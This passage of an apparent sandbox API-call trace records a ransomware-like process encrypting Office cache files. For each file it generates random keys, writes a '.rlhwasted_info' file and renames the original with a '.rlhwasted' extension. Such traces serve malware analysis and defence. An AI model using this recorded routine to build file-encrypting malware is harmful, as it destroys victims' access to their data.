dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0185.117] CreateFileMappingW (hFile=0x114, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0185.117] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x6a3b [0185.117] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x6a3b) returned 0x6a0000 [0185.117] CloseHandle (hObject=0x114) returned 1 [0185.125] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f4f10) returned 1 [0185.126] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x1b8, pbBuffer=0x6eb868 | out: pbBuffer=0x6eb868) returned 1 [0185.126] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.126] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f4f10) returned 1 [0185.127] CryptGenRandom (in: hProv=0x6f4f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.127] CryptReleaseContext (hProv=0x6f4f10, dwFlags=0x0) returned 1 [0185.170] SetEndOfFile (hFile=0x124) [0185.170] SetEndOfFile (hFile=0x124) returned 1 [0185.173] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.173] CloseHandle (hObject=0x124) returned 1 [0185.176] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eb570 | out: hHeap=0x6b0000) returned 1 [0185.176] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec880 | out: hHeap=0x6b0000) returned 1 [0185.177] _aulldvrm () returned 0x0 [0185.177] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x710fe8) returned 1 [0185.177] CryptGenRandom (in: hProv=0x710fe8, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.177] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.178] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0185.178] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a6) returned 0x6ec7b8 [0185.178] lstrcpyW (in: lpString1=0x6ec854, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.178] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.178] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x710fe8) returned 1 [0185.178] CryptGenRandom (in: hProv=0x710fe8, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.178] CryptReleaseContext (hProv=0x710fe8, dwFlags=0x0) returned 1 [0185.179] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.179] WriteFile (in: hFile=0x124, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.180] SetEndOfFile (hFile=0x124) returned 1 [0185.180] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.180] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.180] lstrcpyW (in: lpString1=0x6ec854, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.180] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.rlhwasted")) returned 1 [0185.220] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\shellui.mst.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x108 [0185.220] CreateFileMappingW (hFile=0x108, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0185.220] GetFileSize (in: hFile=0x108, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0xe00 [0185.220] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe00) returned 0x6a0000 [0185.220] CloseHandle (hObject=0x108) returned 1 [0185.226] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.227] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ecca8 | out: pbBuffer=0x6ecca8) returned 1 [0185.227] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.227] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.228] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.228] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.239] SetEndOfFile (hFile=0x124) returned 1 [0185.242] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.242] CloseHandle (hObject=0x124) returned 1 [0185.248] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ec7b8 | out: hHeap=0x6b0000) returned 1 [0185.248] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ecb68 | out: hHeap=0x6b0000) returned 1 [0185.248] _aulldvrm () returned 0x0 [0185.248] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.249] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.249] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.249] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml") returned 92 [0185.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2c2) returned 0x6d56f0 [0185.249] lstrcpyW (in: lpString1=0x6d57a8, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.249] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.249] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.250] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.250] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.250] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.251] WriteFile (in: hFile=0x124, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.252] SetEndOfFile (hFile=0x124) returned 1 [0185.252] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.252] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.252] lstrcpyW (in: lpString1=0x6d57a8, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.252] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.rlhwasted")) returned 1 [0185.253] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\branding.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\branding.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0185.253] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0185.253] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x91975 [0185.253] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91975) returned 0x12b0000 [0185.254] CloseHandle (hObject=0x110) returned 1 [0185.313] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.315] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.315] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.315] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.316] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.316] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.374] SetEndOfFile (hFile=0x124) [0185.374] SetEndOfFile (hFile=0x124) returned 1 [0185.377] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.377] CloseHandle (hObject=0x124) returned 1 [0185.379] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d56f0 | out: hHeap=0x6b0000) returned 1 [0185.379] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6f4ce0 | out: hHeap=0x6b0000) returned 1 [0185.379] _aulldvrm () returned 0x0 [0185.379] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.381] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.382] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.382] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0185.382] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0185.382] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.382] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.382] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.383] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.383] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.383] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.384] WriteFile (in: hFile=0x124, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.386] SetEndOfFile (hFile=0x124) returned 1 [0185.386] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.386] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.386] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted")) returned 1 [0185.420] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0185.420] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0185.420] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x10b2 [0185.420] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x6a0000 [0185.420] CloseHandle (hObject=0x128) returned 1 [0185.464] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.465] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.465] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.465] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.466] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.466] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.477] SetEndOfFile (hFile=0x124) returned 1 [0185.523] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.523] CloseHandle (hObject=0x124) returned 1 [0185.525] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x70cfe8 | out: hHeap=0x6b0000) returned 1 [0185.525] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6eba30 | out: hHeap=0x6b0000) returned 1 [0185.526] _aulldvrm () returned 0x0 [0185.526] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.527] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.527] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.527] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0185.527] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2a2) returned 0x6d4580 [0185.527] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.527] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.527] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.528] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.528] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.528] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.531] WriteFile (in: hFile=0x124, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.532] SetEndOfFile (hFile=0x124) returned 1 [0185.532] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.532] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.532] lstrcpyW (in: lpString1=0x6d4618, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted")) returned 1 [0185.534] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\Setup.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-0011-0000-1000-0000000ff1ce}-c\\setup.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x10c [0185.534] CreateFileMappingW (hFile=0x10c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0185.534] GetFileSize (in: hFile=0x10c, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x7976 [0185.534] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7976) returned 0x6a0000 [0185.534] CloseHandle (hObject=0x10c) returned 1 [0185.542] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.543] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, pbBuffer=0x6ee610 | out: pbBuffer=0x6ee610) returned 1 [0185.543] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.543] CryptAcquireContextW (in: phProv=0x12afbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afbec*=0x6f6f10) returned 1 [0185.544] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x200, pbBuffer=0x12afc08 | out: pbBuffer=0x12afc08) returned 1 [0185.544] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.554] SetEndOfFile (hFile=0x124) returned 1 [0185.557] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.557] CloseHandle (hObject=0x124) returned 1 [0185.560] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6d4580 | out: hHeap=0x6b0000) returned 1 [0185.560] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6ef390 | out: hHeap=0x6b0000) returned 1 [0185.561] _aulldvrm () returned 0x0 [0185.561] CryptAcquireContextW (in: phProv=0x12afecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afecc*=0x6f6f10) returned 1 [0185.561] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x48, pbBuffer=0x12aff08 | out: pbBuffer=0x12aff08) returned 1 [0185.561] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.561] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml") returned 81 [0185.561] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x2ac) returned 0x70cfe8 [0185.562] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted_info" | out: lpString1=".rlhwasted_info") returned=".rlhwasted_info" [0185.562] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0xa34) returned 0x6e6980 [0185.562] CryptAcquireContextW (in: phProv=0x12afea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afea8*=0x6f6f10) returned 1 [0185.562] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0xa34, pbBuffer=0x6e6980 | out: pbBuffer=0x6e6980) returned 1 [0185.562] CryptReleaseContext (hProv=0x6f6f10, dwFlags=0x0) returned 1 [0185.562] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted_info" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0185.564] WriteFile (in: hFile=0x124, lpBuffer=0x6e6980*, nNumberOfBytesToWrite=0xa34, lpNumberOfBytesWritten=0x12afec4, lpOverlapped=0x0 | out: lpBuffer=0x6e6980*, lpNumberOfBytesWritten=0x12afec4*=0xa34, lpOverlapped=0x0) returned 1 [0185.565] SetEndOfFile (hFile=0x124) returned 1 [0185.565] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0185.565] HeapFree (in: hHeap=0x6b0000, dwFlags=0x0, lpMem=0x6e6980 | out: hHeap=0x6b0000) returned 1 [0185.565] lstrcpyW (in: lpString1=0x70d08a, lpString2=".rlhwasted" | out: lpString1=".rlhwasted") returned=".rlhwasted" [0185.565] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted")) returned 1 [0185.566] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\Office32WW.xml.rlhwasted" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\office32ww.xml.rlhwasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0185.566] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x10c [0185.566] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x12afe94 | out: lpFileSizeHigh=0x12afe94*=0x0) returned 0x10b2 [0185.566] MapViewOfFile (hFileMappingObject=0x10c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10b2) returned 0x6a0000 [0185.566] CloseHandle (hObject=0x110) returned 1 [0185.636] CryptAcquireContextW (in: phProv=0x12afe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12afe84*=0x6f6f10) returned 1 [0185.637] CryptGenRandom (in: hProv=0x6f6f10, dwLen=0x1b8, 